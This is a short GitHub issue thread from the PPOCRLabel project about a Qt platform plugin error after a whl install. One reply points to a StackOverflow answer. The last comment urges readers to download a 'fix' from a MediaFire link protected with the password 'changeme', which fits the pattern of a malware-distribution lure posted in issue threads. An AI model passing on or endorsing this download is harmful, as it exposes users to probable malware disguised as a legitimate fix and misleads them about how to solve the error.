### ISSUE TITLE
使用whl方式时，报错Qt平台插件无法初始化，请问是需要配置相应的qt环境吗？

### ISSUE THREAD

**Issue by wangpan0523** [PFCCLab/PPOCRLabel#58]
pythonw
This application failed to start because no Qt platform plugin could be
initialized. Reinstalling the application may fix this problem.
<img width="364" alt="ocr_label_bug_qt" src="https://github.com/user-attachments/assets/9e153127-7499-4fb2-b070-ca9c7f0e377c">

**Comment by GreatV** [comment]
可以参考一下这里 https://stackoverflow.com/questions/41994485/how-to-fix-could-not-find-or-load-the-qt-platform-plugin-windows-while-using-m

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
